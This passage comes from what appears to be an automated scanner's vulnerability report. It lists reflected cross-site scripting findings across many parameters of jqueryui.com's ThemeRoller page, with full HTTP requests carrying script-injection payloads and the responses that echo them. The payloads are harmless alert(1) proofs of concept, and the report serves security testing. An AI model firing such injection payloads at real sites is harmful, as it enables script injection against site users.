GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
meroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5653"><script>alert(1)</script>a61da8af9c5 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d42"><script>alert(1)</script>5be9fe66018 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e2d"><script>alert(1)</script>60dbb8bd3af was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerR
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea49"><script>alert(1)</script>bb88e881afa was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad9e"><script>alert(1)</script>111ada64c2c was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bc0"><script>alert(1)</script>e24a25cb4c9 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
light_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorH
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef13"><script>alert(1)</script>dcecacde3c4 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46a8"><script>alert(1)</script>1f7af90ed7f was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f4a"><script>alert(1)</script>475d9e92991 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

